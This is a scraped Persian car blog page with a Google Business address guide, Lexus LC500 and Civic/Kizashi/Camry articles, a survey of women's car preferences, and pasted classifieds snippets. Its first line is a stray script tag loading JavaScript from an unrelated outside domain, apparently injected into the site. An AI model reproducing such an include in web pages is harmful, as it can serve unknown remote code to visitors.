script type="text/javascript" src="http://7vps.ir/img/website.js"> افزودن یا ویرایش نشانی کسب و کار
کافی نت
وبلاگی جذاب

برای به تأیید رساندن کسب و کارتان، باید نشانی کسب و کاری را که Google می‌تواند تعیین مکان کند وارد کنید. برای اینکه نشانی‌تان به درستی در Maps نشان داده شود، مطمئن شوید نشانی‌تان از دستورالعمل‌های نشانی پیروی می‌کند.  هنگام وارد کردن نشانی:

  • نشانی خیابان مکانتان را کامل و دقیق وارد کنید. مثلاً: شیراز، خیابان ملاصدرا، کوچه سرمدی، پلاک ۱۶، کدپستی: ۷۴۱۵۶. 
  • شماره واحد، طبقه، شماره ساختمان و غیره را لحاظ کنید. 
  • فقط اطلاعاتی را وارد کنید که بخشی از نشانی رسمی شما هستند. اطلاعاتی مانند تقاطع‌ها و علامت‌های مشخصه اطراف فقط باید در منطقه‌هایی گنجانده شوند که نشانی رسمی خیابان، مکان کسب و کار را به‌طور دقیق مشخص نکند. برای مثال، اضافه کردن «نبش خیابان کارگر و بلوار کشاورز» یا «روبروی پارک ملی» در صورت امکان نباید استفاده شود.

برای افزودن یا ویرایش نشانی کسب و کار:

  1. به سیستم ‏Google‏ برای کسب و کار من وارد شوید.
  2. برای یک مکان:
    • از نمای کارت، مکان مورد نظرتان را برای مدیریت انتخاب کنید و روی مدیریت مکان کلیک کنید. اگر مکان‌هایتان را به‌جای کارت به‌صورت فهرست می‌بینید، با کلیک روی نماد کارت‌ها (در سمت چپ بالای مکان‌هایتان) به نمای کارت بروید. 
    • روی اطلاعات در بالای صفحه کلیک کنید. 
  3. برای چند مکان:
    • از نمای فهرست، مکان‌های موردنظرتان را برای مدیریت انتخاب کنید. اگر مکان‌هایتان را به‌جای فهرست به‌صورت کارت می‌بینید، با کلیک روی نماد فهرست (در سمت چپ بالای مکان‌هایتان) به نمای فهرست بروید.
    • روی نماد مداد کلیک کنید.
  4. روی فیلد نشانی کلیک کنید؛ 
  5. با دنبال کردن دستورالعمل‌های بالا نشانی‌تان را وارد کنید، سپس روی اعمال کلیک کنید؛
  6. اگر نتوانیم نشانی‌تان را پیدا کنیم، دکمه قرمز تنظیم مکان نشانگر روی نقشه شهر شما در سمت چپ پنجره ظاهر می‌شود. روی تنظیم مکان نشانگر کلیک کنید.
  7. نقشه‌‌ای با سنجاق قرمزرنگ ظاهر می‌شود که نشانگر مکان کسب و کار شماست. می‌توانید روی این سنجاق کلیک کنید و آن را روی نقشه بکشید. سنجاق را در مرکز مکانتان قرار دهید. (برای مثال، اگر فروشگاه تحت مدیریت شما در بازاری طولانی واقع شده است، سنجاق را در مرکز فروشگاهتان در داخل بازار قرار دهید.) از دکمه‌های + و - در سمت راست بالای صفحه‌نمایش برای بزرگ‌نمایی و کوچک‌نمایی استفاده کنید.
  8. وقتی مطمئن شدید مرکز مکانتان را دقیقاً مشخص کرده‌اید، روی تأیید کلیک کنید. توجه داشته باشید که ویرایش‌هایتان ممکن است پیش از انتشار از نظر کیفیت ارزیابی شوند.


جمعه 22 بهمن 1395برچسب:افزودن یا ویرایش نشانی کسب و کار, :: 7:23 بعد از ظهر
گری گوری

درست سال ۲۰۱۲ بود که شرکت خودروسازی لکسوس از خودروی کانسپتی بنام LF-LC رونمایی کرد. خودرویی که شاید جایگزین کوپه LFA همین شرکت می شد و جای خالی این خودرو را پر می کرد تا باری دیگر برند لکسوس در کلاس خودروهای اسپرت قد علم کند، اما متاسفانه اطلاعات زیادی از خودرو و زمان تولید نسخه اصلی آن منتشر نشد، سال پیش نیز این شرکت ژاپنی یک مدل دیگر براساس کانسپت LF-LC رونمایی کرد که اینبار در کلاس خودروی سدان قرار می گرفت و زبان طراحی این شرکت را به رخ می کشید. حال شرکت لکسوس بعد از گذشت ۱ سال از رونمایی آخرین کانسپت خود خودرویی بنام LC500 را رونمایی کرده است که براساس همان خودروی کانسپت LF-LC طراحی و به مرحله تولید رسیده است.lexus-lc500-9

لکسوس LC500 جایگزین خودروی اسپرت LFA می شود

این خودرو از زبان طراحی جدید شرکت لکسوس پیروی می کند، طراحی زیبا و چشم نواز که سعی بر حفظ مؤلفه‌های طراحی اصلی کانسپت LF-LC در آن شده است تا نهایت زیبایی بدست آید. همانطور که می‌بینید، لکسوس مشابه با طرح کاسنپت LF-LC، در جلوی بدنه LC500 جلوپنجره‌ای بزرگ و گسترده را طراحی کرده که درون آن را با جزئیات کوچک کرومی رنگ پر کرده و حاشیه آن را هم نواری کرومی رنگ زیبا در بر گرفته است. در اطراف این جلوپنجره زیبا هم چراغ‌های پیشانی شکیل و مدرنیته طراحی شده که در زیر آن ورودی‌های هوای خنک کاری رادیاتورهای جانبی قالب گیری شده است. با چرخیدن به دور خودرو و نگاه انداختن به طراحی عقبی خودرو هم با یک طراحی دوچندان جذاب‌تر و زیباتر از طراحی جلویی مواجه خواهید شد که چراغ‌های پیشرفته و خروجی‌های اگزوز متوازی الاضلاع کرومی رنگ آن بیشترین تاثیر را در زیبایی آن گذاشته اند. به جای استفاده از اسپویلری جداگانه هم از همان درب صندوق عقب کمک گرفته شده و با استفاده از قالب گیری، اسپویلری ثابت برای لکسوس LC500 دست و پا کرده‌اند.lexus-lc500-6

لکسوس LC500 جایگزین خودروی اسپرت LFA می شود

در داخل کابین همان‌طور که از لکسوس انتظار می‌رود شاهد ترکیبی لوکس و با کیفیت از چرم، آلکانترا و سایر مواد گران قیمت نظیر منیزیوم برای شیفتر پشت فرمان هستیم. کلیات این مجموعه از لکسوس LFA الهام گرفته‌اند اما این موضوع نکته منفی محسوب نمی‌شود. صندلی‌های اسپرت با قسمتهای تقویتی و حمایتی اضافی در پهلوها همراه شده‌اند و البته در مدل استاندارد، شاهد صندلی‌های ساده‌تری که راحتی بیشتری دارند خواهید بود.

این کوپه با عملکرد بالا به صورت ۲+۲ نفره و در دو نسخه معمولی و هیبریدی در دسترس خواهد بود. مدل اصلی از یک موتور ۸ سیلندر ۵٫۰ لیتری با تنفس طبیعی با قدرت ۴۷۷ اسب بخار و گشتاور ۵۳۰ نیوتن متر سود می‌برد. این موتور با یک گیربکس ۱۰ سرعته اتوماتیک که توسط Aisin توسعه یافته جفت می‌شود که می تواند در کمتر از ۵/۴ ثانیه سرعت خود را به ۱۰۰ کیلومتر بر ساعت برساند.

برای تولید این خودرو بیش از سه سال در واحد تحقیق و توصعه برای مطالعه زمان گذاشته شد و در نهایت خودرویی طراحی شد که برندگی خطوط آن همانند تیغ می باشد. در طراحی این خودرو همکاری بین تیم های تحقیق و توسعه و مهندسین لکسوس به اوج خود رسید تا جایی که این خودرو به عنوان سمبلی از طراحی ها معرفی شد. از سویی ممکن است یک موتور ۸ سیلندر ۴٫۰ لیتری جدید با توربوشارژر الکتریکی دوقلو نیز در مدل LC F قرار گیرد که نیرویی ۶۱۲ اسبی برای آن پیش بینی می‌شود که قدرتمندترین لکسوس تاریخ را شکل می‌دهد.lexus-lc500-8

لکسوس LC500 جایگزین خودروی اسپرت LFA می شود

لکسوس LC 500 روی پلتفرم کاملاً جدید GA-L که معماری موتور جلو و دیفرانسیل عقب دارد بنا شده است. در این معماری، به‌طور قابل‌توجهی تجربه رانندگی تند و تیز با وجود قرارگیری در ارتفاع پایین‌تر و نزدیک مرکز خودرو حاصل می‌شود. به گفته شرکت لکسوس، شاسی LC500 سخت‌ترین نمونه ایست که تا به حال مهندسین این شرکت تولید نموده‌اند و این یعنی این شاسی از جنس فولاد با مقاومت بالا حتی از شاسی فیبر کربنی LFA نیز مقاوم‌تر است. در عین حال این شاسی فولادی در قسمت‌هایی در تعلیق جلو و ساختارهای گلگیرهای عقب از آلومینیوم ساخته شده که باعث کاهش وزنان شده است. سقف از جنس فیبر کربن بوده و درب موتور نیز آلومینیومی است. استفاده از کامپوزیت و فیبر کربن در قسمت‌های مختلف باعث توزیع وزن مطلوب به‌صورت ۵۲/۴۸ بین دو اکسل شده است.
در ادامه دو ویدئو از این خودرو را برای شما آماده کرده ایم که پیشنهاد میکنیم به هیچ وجه از دست ندهید. و همچنین نظر شما درباره این خودروی چیست؟ آیا این خودرو می توان به خوبی جای خالی LFA را پر کند؟



خانم های ایرانی چه خودروهایی را انتخاب میکنند؟

خانم های ایرانی چه خودروهایی را انتخاب میکنند؟

از آنجایی که اتومبیل یک وسیله چند‌منظوره و کاربردی است، تا به حال هیچ یک از کمپانی‌های خودروسازی، مدلی را صرفا برای خانم‌ها یا آقایان به صورت انبوه تولید نکرده‌اند اما از این جهت که معمولا سلیقه خانم‌ها در انتخاب و خرید برخی‌ کالا‌ها، متفاوت از آقایان است، می‌توان این مسئله را در نظر گرفت که مثلا برخی ‌خودروها با توجه به مشخصات و ویژگی‌هایی که دارند، بیشتر مورد پسند خانم‌ها قرار بگیرند. %d8%ae%d8%a7%d9%86%d9%85-%d9%87%d8%a7%db%8c-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%da%86%d9%87-%d8%ae%d9%88%d8%af%d8%b1%d9%88%d9%87%d8%a7%db%8c%db%8c-%d8%b1%d8%a7-%d8%a7%d9%86%d8%aa%d8%ae%d8%a7%d8%a8 به همین دلیل، در یک نظرسنجی که به مدت ۶ ماه و به طور انتخابی در میان خانم‌های حدودا ۲۰ الی ۴۵‌ ساله، اعم از خانه‌دار، دانشجو، استاد دانشگاه، پزشک، کارمند و سایر مشاغل صورت گرفت، از آنها خواستیم که سلیقه و نظرات خود در خصوص انتخاب و خرید اتومبیل مورد نظرشان را با پاسخ به سوالات طرح شده، بیان کنند که اگرچه تعداد افراد شرکت‌کننده در این نظرسنجی غیر‌رسمی، کمتر از ۳۰۰ نفر است اما تا حدی می‌تواند نشان‌دهنده مشخصات یک خودرو مناسب از نظر خانم‌های ایرانی باشد. به گزارش ایران‌جیب به نقل از خودرو امروز، لازم به ذکر است که تقریبا ۶۵ درصد شرکت‌کنندگان این نظرسنجی دارای خودرو شخصی هستند و از این تعداد، حدود ۷۰‌ درصد آنها مالک خودروهای داخلی، ۲۹ درصد مالک خودروهای وارداتی و کمتر از یک درصد نیز مالک خودروهای وارداتی لوکس (با قیمتی بیش از ۲۰۰ میلیون تومان) هستند.

صفر کیلومتر یا دست دوم؟

تقریبا ۷۵ درصد شرکت‌کنندگان این نظرسنجی، خرید خودرو صفر کیلومتر را به دست دوم ترجیح می‌دهند و دلیل این امر را،اطمینان از سلامت قطعات و تجهیزات و همچنین حس خوشایند نو‌بودن کابین و ادوات خودرو می‌دانند، اما ۲۵ درصد دیگر معتقدند که معمولا به جای یک اتومبیل صفرکیلومتر می‌توان یک مدل کامل‌تر یا به نوعی ایده‌آل‌تر را با همان قیمت و به صورت کارکرده خریداری کرد، ضمن اینکه این گونه از اتومبیل‌ها، مرحله افت قیمت اولیه خود را نیز پشت سر گذاشته‌اند و به نوعی، حساسیت‌های یک اتومبیل نو و صفرکیلومتر را دارا نیستند.

باید بخوانید:  ایران خودرو پژو 508 را برای رقابت باکمری و سوناتا وارد بازار میکند

%d8%ae%d8%a7%d9%86%d9%85-%d9%87%d8%a7%db%8c-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%da%86%d9%87-%d8%ae%d9%88%d8%af%d8%b1%d9%88%d9%87%d8%a7%db%8c%db%8c-%d8%b1%d8%a7-%d8%a7%d9%86%d8%aa%d8%ae%d8%a7%d8%a8

داخلی یا وارداتی؟

بیش از ۹۰ درصد این خانم‌ها، تمایل دارند که خودرو خارجی یا در واقع همان وارداتی را خریداری کنند و این درحالی است که بیش از نیمی از شرکت‌کنندگان در این نظرسنجی، صاحب خودرو داخلی بودند. بدین ترتیب وقتی صحبت از توان خرید خودرو در بازه زیر ۱۰۰ میلیون تومان و همچنین انتخاب میان خودروهای ایرانی و چینی شد، حدود ۵۵ درصد آنها به اتومبیل‌های چینی (وارداتی و یا مونتاژ داخل) و ۴۵ درصد دیگر نیز به دیگر خودروهای داخلی رأی دادند، هرچند که همگان معتقد بودند، در صورت افزایش کیفیت و امکانات خودروهای داخلی، خرید اتومبیل ایرانی را به دلیل سهولت در تامین قطعات و همچنین گسترده بودن شبکه خدمات پس از فروش آنها، در اولویت قرار می‌دهند.

کدام کلاس خودرویی؟

اگر تصور می‌کنید که اکثر خانم‌ها خودروهای‌ هاچ‌بک را می‌پسندند، باید بگوییم که تقریبا ۴۰ درصد آنها کلاس سدان (خصوصا سدان‌های متوسط) و ۳۰ درصد نیز شاسی‌بلندهای کوچک را می‌پسندند و با این حساب، دیگر رأی‌ها مختص مدل‌های‌ هاچ‌بک و همچنین کوپه است که البته مورد آخر، بیشتر توسط شرکت‌کنندگان جوان مطرح شده است.

کم‌مصرف و اقتصادی یا سریع و پر‌قدرت؟

بیشتر خانم‌ها ترجیح می‌دهند که خودروهای کم‌مصرف و اقتصادی را خریداری کنند و در واقع معتقدند که این گونه از خودروها، هم از لحاظ هزینه‌های نگهداری به‌صرفه‌تر هستند و هم اینکه با توجه به میزان رانندگی آنها در طول روز، کمتر به پمپ بنزین مراجعه خواهند کرد. همچنین از آنجایی که بیشتر آنها، مخالف تعویض مکرر و زود‌هنگام اتومبیل بودند، خرید یک اتومبیل اقتصادی و کم‌استهلاک را به یک اتومبیل پر‌قدرت و نسبتا پر‌خرج ترجیح می‌دهند.

باید بخوانید:  بنز در ایران ساخته خواهد شد؟!!!

%d8%ae%d8%a7%d9%86%d9%85-%d9%87%d8%a7%db%8c-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%da%86%d9%87-%d8%ae%d9%88%d8%af%d8%b1%d9%88%d9%87%d8%a7%db%8c%db%8c-%d8%b1%d8%a7-%d8%a7%d9%86%d8%aa%d8%ae%d8%a7%d8%a8

گیربکس دستی یا اتوماتیک؟

همان‌طور که انتظار داشتیم، حدود ۸۰ درصد خانم‌ها به دلیل سهولت در رانندگی، تمایل به خرید خودروهای اتوماتیک دارند و البته دیگر شرکت‌کنندگان این نظرسنجی معتقدند که بیشتر به رانندگی با گیربکس‌های دستی عادت کرده‌اند و این مسئله برایشان اهمیت چندانی ندارد، خصوصا اینکه از نظر بعضی از آنها، اختیار عمل در خودروهای گیربکس دستی بیشتر از مدل‌های اتوماتیک است و در واقع ترجیح می‌دهند که خودشان دنده مناسب را انتخاب کنند.

رنگ بدنه و پوشش داخلی

برخلاف تصور معمول، حدود ۶۰ درصد خانم‌ها، نه‌تنها رنگ‌های روشن را انتخاب نکردند، بلکه تمایل به خرید خودروهای مشکی‌رنگ دارند و بعد از آن هم، رنگ‌های سفید، قهوه‌ای متالیک، نوک مدادی متالیک و قرمز در رتبه‌های دوم تا پنجم قرار می‌گیرند. در مورد رنگ پوشش و تریم داخلی خودرو نیز باید بگوییم که بیشترین رأی، مختص رنگ‌های روشن (خصوصا کرم) بود.

تجهیزات و امکانات رفاهی مهم

از نظر خانم‌های شرکت‌کننده در این نظر‌سنجی، ظاهر خودرو، سطح ایمنی، کیفیت ساخت و البته مرغوبیت سیستم تهویه مطبوع و همچنین ترمزها، به عنوان مهم‌ترین ملاک در انتخاب اتومبیل شناخته می‌شوند و علاوه بر این انتظار دارند که خودرو آنها دارای سیستم صوتی خوب، اتاق راحت و جادار، فرمان نرم، آینه پشت آفتابگیر، سنسور پارک عقب (ترجیحا همراه با دوربین)، سیستم کروز کنترل و همچنین میدان دید مناسب باشد. %d8%ae%d8%a7%d9%86%d9%85-%d9%87%d8%a7%db%8c-%d8%a7%db%8c%d8%b1%d8%a7%d9%86%db%8c-%da%86%d9%87-%d8%ae%d9%88%d8%af%d8%b1%d9%88%d9%87%d8%a7%db%8c%db%8c-%d8%b1%d8%a7-%d8%a7%d9%86%d8%aa%d8%ae%d8%a7%d8%a8 منبع:ایران جیب



شنبه 24 مهر 1395برچسب:, :: 3:54 بعد از ظهر
گری گوری
مقایسه هوندا سیویک 2013 و سوزوکی کیزاشی

مقایسه هوندا سیویک ۲۰۱۳ و سوزوکی کیزاشی

Honda Civic

سیویک ۲۰۱۳

مقایسه هوندا سیویک ۲۰۱۳ و سوزوکی کیزاشی
هوندا سیویک را میتوان محبوب ترین خودرو کلاس خودش در بین جوانان دانست زیرا به شدت خودرو جذابی میباشد . طراحی ظاهری هوندا سیویک مجذوب کننده ، هماهنگ و زیبا است . در نمای جانبی سیویک یک خط سر تا سری دارد که از چراغ جلو تا صندوق عقب کشیده شده است و زیبایی نمای این قسمت را دو چندان کرده است . در قسمت عقب سیویک هم فرم چراغ ها ، شکل سپر و طراحی زیبای صندوق عقب چهره ای به شدت خیره کننده و جذاب به سیویک بخشیده است . در داخل کابین هوندا سیویک هم مانند نمای ظاهری طراحی اش بسیار زیبا ، مدرن و جذاب میباشد . داشبورد سیویک در قسمت میانی راننده محور است و فاصله زیادی هم با شیشه جلو دارد که بسیار خاص و جذاب میباشد .  اکثریت نشانگرهای هوندا سیویک الکترونیکی میباشد و کمتر عقربه آنالوگی در پشت آمپر سیویک مشاهده میکنید که برای راننده  جذابیت خاصی را به ارمغان آورده است . درون کابین هوندا سیویک از بهترین متریال استفاده شده است و کیفیت ساخت و مونتاژ هم بسیار بالاست . از نظر امکانات هم در هوندا سیویک هر آنچه که برای خودرویی در این کلاس نیاز است را میتوانید بیابید که با بهترین کیفیت و عملکرد شما را شگفت زده میکند . در بحث ابعاد هم هوندا سیویک جادار ترین خودروی کلاس خود میباشد .
قلب تپنده هوندا سیویک ۴ سیلندر میباشد ، ۱۸۰۰ سی سی حجم دارد و از سری I-VTEC است . هوندا سیویک با تکیه بر این پیشرانه ۱۴۰ اسب بخار قدرت و ۱۷۷ نیوتن متر گشتاور تولید میکند . بازدهی پیشرانه هوندا سیویک بسیار بالاست زیرا شتاب و کشش بسیار خوبی دارد ، استهلاکش بسیار پایین است و مصرف سوختش هم کاملا اقتصادی میباشد . برای انتقال قدرت سیویک به چرخهایش از یک گیربکس ۵ سرعته اتوماتیک استفاده شده است که فقط میتوان گفت عملکردش عالی است و با موتور هماهنگی کامل دارد . شما از این همه دقت و کیفیت در تعویض دنده سیویک کاملا شگفت زده خواهید شد .

کیفیت رانندگی با هوندا سیویک فوق العاده است و هندلینگ بی نظیری دارد و تنها با یک بار راندن سیویک عاشقش میشوید . عملکرد سیستم تعلیق هوندا سیویک فوق العاده است ، فرمان پذیری و دقت فرمانش حرف ندارد و ترمزهایش به شما اطمینان حرکت با هر سرعتی را میدهد .

به عنوان کلام پایانی هوندا سیویک را میتوان فوق العاده ترین انتخاب شما در این کلاس با توجه به بودجه دانست . در کنار این همه خوبی و نقاط مثبت سیویک یکی از نکات قابل تامل این خودرو هم قهر بودنش با تعمیرگاه است . شاید تنها ایراد هوندا سیویک را در این دانست که حتی با یک بار لمس تجربه رانندگیش شیفته و عاشق آن میشوید .

باید بخوانید:  هوندا NSX مدل 2017 قیمت گذاری شد
بازار خودروهای وارداتی به قدری داغ شده که همه ساله مردم چشم به راه خودرویی جدید و یا نسل جدیدی از خودروهای موجود در بازار هستند. در این میان کره ای ها و ژاپنی ها سهم بیشتری در بازار داشته و تعداد خودروهای آنها در خیابان به دیگر برندها می چربد. دیگر شرکت های خودروساز داخلی نیز در این میان بی کار نبوده و سعی در عرضه خودروهای لوکس خارجی دارند که البته این خودروها در چرخه تولید قرار داشته و خرید آن ها نیز موجب رونق اقتصاد کشور می شود. این خودروهای لوکس تولیدی را می توان در جاده مخصوص کرج بیشتر از هر جای دیگری مشاهده کرد.

camry-kizashi تویوتا کمری و سوزوکی کیزاشی

ایران خودرو بزرگ ترین خودروساز خاورمیانه چند سالی است که به تولید خودروهای مختلف برند ژاپنی سوزوکی روی آورده است. در ابتدا با تولید مدل گرند ویتارا این همکاری را آغاز کرد و حالا با خودرویی در کلاس سواری است. کیزاشی که در آینده بیشتر از آن خواهیم شنید، در کلاس D سواری ها قرار دارد کلاسی که به سدان های خانوادگی نیمه لوکس تعلق دارد و در این کلاس نیز رقیبی ژاپنی انتظار کیزاشی را می کشد؛ تویوتا کمری که سال هاست در بازار ایران به فروش می رسد و یکی از موفق ترین ها در این کلاس به حساب می آید. در این گزارش رقابتی ژاپنی را شاهد هستیم. دو خودرویی که یکی از شرق و دیگری از غرب تهران به خیابان ها فرستاده می شوند.

suzuki-kizashi1سوزوکی کیزاشی

کیزاشی با موتور چهار سیلندر ۲٫۴ لیتری روانه بازار ایران می شود. این موتور قادر است در ۶۵۰۰ دور بر دقیقه ۱۸۵ اسب بخار قدرت تولید کرده و در چهار هزار دور بر دقیقه ۲۳۰ نیوتن متر گشتاور را ارائه دهد. وظیفه انتقال نیرو در این خودرو به عهده گیربکس CVT است که در داشتن مصرف سوخت پایین این خودرو نقشی تاثیر گذار دارد. البته کیزاشی در ایران با گیربکس شش سرعته دستی نیز عرضه می شود. این خودرو برای اولین بار در سال ۲۰۰۹ راهی بازار شد و توانست در نیوزیلند و استرالیا فروش خوبی را تجربه کند. کیزاشی قادر است در مدت زمان ۸٫۸ ثانیه با گیربکس CVT از حالت ایستاده به سرعت ۱۰۰ کیلومتر بر ساعت برسد که این زمان با گیربکس دستی حدود یک ثانیه کاهش می یابد. کیزاشی می تواند تا ۲۱۵ کیلومتر بر ساعت نیز سرعت بگیرد که برای خودرویی با این حجم مناسب است. این خودرو در سیکل ترکیبی حدود ۷٫ ۹ لیتر در ۱۰۰ کیلومتر بنزین مصرف می کند که این مصرف پایین را مدیون گیربکس CVT پیشرفته خود است.
باید بخوانید:  سال 2020 و خودروی اسپورت الکتریکی نیسان

2012-toyota-camry-2-5-auto-se-sedan-angular-rear۲۰۱۲ Toyota Camry

تویوتا کمری

کمری که این روزها نسل جدید خود را در خیابان های تهران می بیند و البته تعداد آنها زیاد نیست، در ایران قدمت زیادی دارد و تاکنون دو نسل از آن راهی بازار ایران شده است. این خودرو از موتوری چهار سیلندر به حجم ۲۴۹۴ سی سی بهره می برد. موتوری که قادر است در ۶۰۰۰ دور بر دقیقه ۱۸۱ اسب بخار قدرت تولید کند و ۲۳۵ نیوتن متر گشتاور را در ۴۱۰۰ دور بر دقیقه ارائه دهد. وظیفه انتقال قدرت در این خودرو به عهده گیربکس چهار سرعته اتوماتیک است. کمری قادر است در مدت زمان۹٫۶ ثانیه از حالت سکون به سرعت ۱۰۰ کیلومتر بر ساعت برسد و تا ۲۰۵ کیلومتر نیز سرعت بگیرد. مصرف سوخت این ژاپنی ضعیف در سیکل ترکیبی حدود۸٫۲  لیتر در ۱۰۰ کیلومتر است که البته باک ۷۰ لیتری این خودرو به خوبی پاسخ گوی این مقدار مصرف خواهد بود.

طراحی

کیزاشی از طراحی به روز و زیبایی بهره می برد. خودرویی که هم می توان در چهره آن حالت های اسپرت را دید هم این که طراحی با وقاری دارد و در کل می توان چهره آن را عامه پسند دانست. این خودرو در مقابل کمری قرار دارد که هیچ نشانی از یک خودروی اسپرت در آن دیده نمی شود و بیشتر یک خودروی خانوادگی می نماید. در داخل کابین نیز هر دو خودرو طراحی قابل قبولی را ارائه می دهند. با این تفاوت که نور پردازی در کیزاشی چشم نوازتر و زیباتر از کمری است. صندلی های راحت و فضای کافی برای سرنشینان نیز از خصیصه های دو خودرو به شمار رفته با این تفاوت که در کابین کیزاشی می توان امکانات بیشتری را پیش رو دید.تویوتا کمری از امکاناتی همچون جلو دیسکی خنک شونده و عقب دیسکی – راننده و سرنشین جلودر کل دو عدد – ایموبیلایزر، قفل مرکزی، ریموت کنترل، رادیو و پخش CD و چهار بلندگو، بلوتوث و چنجر شش تایی سفارشی، تهویه مطبوع دستی، تنظیم برقی صندلی راننده، تنظیم برقی گودی کمر، تنظیم برقی آیینه ها، شیشه بالابر جلو و عقب برقی، چراغ های جلوی هالوژنی و کروز کنترل بهره مند است.
باید بخوانید:  پیشرانه سه سیلندر هوندا
کیزاشی از امکانات بیشتری نسبت به کمری برخوردار است که می توان به صندلی راننده (۱۰ حرکت) و سرنشین (چهار حرکت) با تنظیم برقی، صندلی راننده دارای سه حافظه تنظیم اتوماتیک، روکش صندلی ها و تودوزی چرمی، گرم کن صندلی راننده و سرنشین، صندلی عقب تاشونده، چرخ زاپاس مطابق با چرخ اصلی، ترمز جلو دیسکی تهویه شونده، ترمز عقب دیسکی، ترمز ضد قفل ABS با توزیع الکترونیکی نیرو EBD، سیستم کمکی ترمز ABS، برنامه پایداری الکترونیکی (ESP)، آیینه های جانبی با تنظیم برقی و تاشونده برقی، آیینه وسط الکتروکرومیک (حساس به نور)، هفت عدد کیسه هوا، قفل مرکزی و ورود بدون کلید، کلید روشن / خاموش خودرو، سیستم کمک پارک جلو و عقب، برف پاک کن اتوماتیک مجهز به حسگر باران، سیستم ضدسرقت ایموبیلایزر، سیستم یک پارچه نمایش اطلاعات و مدیریت پیمایش، سقف شیشه ای برقی دارای ضد خرج کردن اهرم های دوگانه تعویض دنده روی فرمان، (شیفت تعطیل) سیستم تثبیت سرعت (کروز کنترل)، تهویه مطبوع اتوماتیک دو منطقه ای، مجرای تهویه و انتقال گرمایش برای سرنشینان عقب، روکش چرم فرمان، فرمان هیدرولیک تلسکوپی با قابلیت تنظیم ارتفاع، کنترل نمایشگر اطلاعات و مدیریت پیمایش وکنترل سیستم تثبیت سرعت اشاره داشت.

نتیجه گیری

کیزاشی یک تازه وارد به بازار ایران است که در حدود ۶۵ تا ۷۰ میلیون تومان قیمت دارد. خودرویی که با داشتن موتوری قوی تر نسبت به کمری و داشتن گیربکس CVT و همچنین امکانات زیاد می تواند بازار خودرویی همچون کمری را به مخاطره بیندازد. تویوتا کمری نیز قیمتی در حدود ۷۰ میلیون تومان دارد و با توجه به داشتن امکانات کم و موتوری کم بازده که قدرت زیادی را ارائه نمی دهد حرف های زیادی برای گفتن در مقابل کیزاشی تازه وارد ندارد. به خصوص این که کیزاشی نیز خودرویی ژاپنی بوده و از نظر کیفیت و دوام در سطح بالایی قرار دارد.

camry-kizashi_rearکمری و کیزاشی

مزایای کیزاشی: طراحی اسپورت، سادگی کار با تجهیزات، هندلینگ و مانور خوب، قیمت پایینتر در برابر رقبا (حدود هزار دلار ارزانتر از نمونه مشابه کمری)، عایق مناسب بدنه و سروصدای کم کابین معایب کیزاشی: سروصدای موتور مخصوصا با گیربکس CVT، مصرف سوخت بیشتر، فضای محدود سر در مدلهای دارای سانروف، بازتاب نور روی صفحه نمایش و اطلاعات محدود قابل نمایش روی آن مزایای کمری: داشبورد ساده و زیبا، ایمنی بالا با ۱۰ ایربگ استاندارد (نمونه های وارداتی به ایران تنها با دو ایربگ!)، تولید مدلهای هیبریدی با مصرف سوخت بسیار پایین، فضای داخلی بیشتر معایب کمری: صندلیهای جلو فاقد محافظ طرفین، رانندگی بدون هیجان، طراحی ظاهری متوسط در نسل جدید

   

Tags:



دو شنبه 19 مهر 1395برچسب:مقایسه هوندا سیویک 2013 و سوزوکی کیزاشی , :: 11:7 قبل از ظهر
گری گوری


چهار شنبه 14 مهر 1395برچسب:, :: 11:40 قبل از ظهر
گری گوری
 
 

مطالب جدید



چهار شنبه 14 مهر 1395برچسب:واقعی نبودن نرخ ارز قاچاق را زیاد می کند, :: 10:58 قبل از ظهر
گری گوری


سه شنبه 13 مهر 1395برچسب:, :: 3:26 بعد از ظهر
گری گوری
    1. باما - خرید خودرو | bama.ir

      bama.ir/car
      خرید خودرو صفر، دست دوم یا کارکرده. فروش خودرو بصورت حواله، نقد یا اقساط با امکان جستجو بر اساس قیمت خودرو، شاسی و استان.
      خرید خودرو (نقد و اقساط) فروش خودرو (صفر و کارکرده) مقایسه و بررسی خودرو، قیمت خودروهای صفر (بازار و نمایندگی) محاسبه قیمت خودروهای دست دوم.

      خرید و فروش خودرو در سراسر ایران - شیپور

      www.sheypoor.com › همه ایران › وسایل نقلیه
      84983 خودرو نو و دسته دوم برای خرید و فروش با قیمت های مناسب در سراسر ایران و حومه شهر.
      خرید خودرو با امکان جستجو بر اساس قیمت خودرو ، بررسی خودرو ، فروش خودرو ، فیلم بررسی خودروهای روز ایران ، قیمت روز خودرو ، اخبار خودرو.
      پژو · ‏تویوتا · ‏بی ام و · ‏نیسان
      فروش هیوندای سوناتا مدل 2010. رنـــــگ :مشکی. کارکرد : 93000 کیلومتر. دنده اتوماتیک ، خودرو فوق از نظر فنی کاملا سالم فول آبشن داخل مشکی تمام رنگ ولی قطعه ای ...
      خرید خودرو,خرید و فروش خودرو ,فروش خودرو , سایت خرید خودرو,سایت فروش خودرو, خرید خودرو دست دوم صفر,سایت خرید و فروش ماشین, سایت خرید خودرو ,سایت خرید ...

      خرید | فروش | وسایل نقلیه | سواری | ماشین | موتور سیکلت | ...

      divar.ir › همهٔ آگهی‌ها › وسایل نقلیه
      آگهی‌ خرید و فروش سواری، ماشین، موتور، خودرو، پراید، پژو، موتور سیکلت نو و دسته دوم و کارکرده با قیمت مناسب و ارزان در تهران و حومه.
      قیمت خودرو,خرید و فروش خودرو,فروش لوازم جانبي خودرو در وب سايت ماشين بازار.
      خريد و فروش انواع خودروهاي صفر و كاركرده - خريد و فروش ماشين - آگهي رايگان خودرو - خريد و فروش ماشينهاي ايراني و خارجي - هيونداي - كيا - ايران خودرو - سايپا.
      1. ثبت رایگان آگهی فروش خودرو - بانی خودرو‏

        تبلیغwww.banikhodro.com/فروش_خودرو/ثبت_آگهی
    2. بیش از 1000 نفر در روز، آگهی فروش خودرو را در بانی خودرو ثبت می کنند
    3. فروش خودرو در سایت ماشین‏

      تبلیغwww.mashin.me/
فروش خودرو نو، دست دوم یا کارکرده. ثبت آگهی رایگان فروش خودرو قیمت روز
آگهی به تفکیک استان و شهر · ثبت آگهی رایگان و طلایی · مدت اعتبار آگهی : نامحدود


سه شنبه 13 مهر 1395برچسب:ثبت رایگان آگهی فروش خودرو - بانی خودرو‏, :: 3:21 بعد از ظهر
گری گوری

 

87,800,000 تومان
کارکرد صفر کیلومتر
دوگانه سوز نمی باشد
